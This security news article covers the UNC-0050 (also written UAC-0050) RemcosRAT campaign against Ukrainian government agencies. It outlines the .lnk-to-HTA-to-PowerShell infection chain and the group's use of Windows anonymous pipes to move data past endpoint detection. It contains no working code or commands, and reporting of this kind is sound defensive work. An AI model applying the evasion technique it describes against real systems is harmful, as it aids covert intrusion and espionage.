Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign

UNC-0050 is targeting government agencies in Ukraine in what appears to be a politically motivated intelligence-gathering operation.

A threat actor known for repeatedly targeting organizations in Ukraine with the RemcosRAT remote surveillance and control tool is back at it again, this time with a new tactic for transferring data without triggering endpoint detection and response systems.
The adversary, tracked as UNC-0050, is focused on Ukrainian government entities in its latest campaign. Researchers at Uptycs who spotted it said the attacks may be politically motivated, with the goal of collecting specific intelligence from Ukrainian government agencies. While the possibility of state sponsorship remains speculative, the groups activities pose an undeniable risk, especially to government sectors reliant on Windows systems, Uptycs researchers Karthickkumar Kathiresan and Shilpesh Trivedi
wrote in a report this week
.
Threat actors have been using
RemcosRAT
— which started life as a legitimate remote administration tool — to control compromised systems since at least 2016. Among other things, the tool allows attackers to gather and exfiltrate system, user, and processor information. It can
bypass
many antivirus and endpoint threat detection tools and execute a variety of backdoor commands. In many instances threat actors have distributed the malware in attachments in phishing emails.
Uptycs has not been able to determine the initial attack vector in the latest campaign just yet but said it is leaning toward job-themed phishing and spam emails as most likely being the malware distribution method. The security vendor based its assessments on emails it reviewed that purported to offer targeted Ukrainian military personnel with consultancy roles at Israels Defense Forces.
The infection chain itself begins with a .lnk file that gathers information about the compromised system and then retrieves an HTML app named 6.hta from an attacker-controlled remote server using a Windows native binary, Uptycs said. The retrieved app contains a PowerShell script that initiates steps to download two other payload files (word_update.exe and ofer.docx) from an attacker-controlled domain and — ultimately — to install RemcosRAT on the system.
What makes UNC-0050s new campaign different is the threat actors use of a
Windows interprocess communications
feature called anonymous pipes to transfer data on compromised systems. As Microsoft describes it, an anonymous pipe is a one-way communications channel for transferring data between a parent and a child process. UNC-0050 is taking advantage of the feature to covertly channel data without triggering any EDR or antivirus alerts, Kathiresan and Trivedi said.
UNC-0050 is not the first threat actor to use pipes to exfiltrate stolen data, but the tactic remains relatively rare, the Uptycs researchers noted. Although not entirely new, this technique marks a significant leap in the sophistication of the groups strategies, they said.
This is far from the first time that security researchers have spotted UAC-0050 attempting to distribute RemcosRAT to targets in Ukraine. On multiple occasions last year, Ukraines Computer Emergency Response Team (CERT-UA) warned of campaigns by the threat actor to distribute the remote access Trojan to organizations in the country.
The most recent was an
advisory on Dec. 21, 2023
, about a mass phishing campaign involving emails with an attachment that purported be a contract involving Kyivstar, one of Ukraines largest telecommunications providers. Earlier in December, CERT-UA warned of another
RemcosRAT mass distribution
campaign, this one involving emails purporting to be about judicial claims and debts targeting organizations and individuals in Ukraine and Poland. The emails contained an attachment in the form of an archive file or RAR file.
CERT-UA issued similar alerts on three other occasions last year, one in November with court subpoena-themed emails serving as the initial delivery vehicle; another, also in November, with emails allegedly from Ukraines security service; and the first in February 2023 about a mass email campaign with attachments that appeared to be associated with a district court in Kyiv.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Threat Group Using Rare Data Transfer Tactic in New RemcosRAT Campaign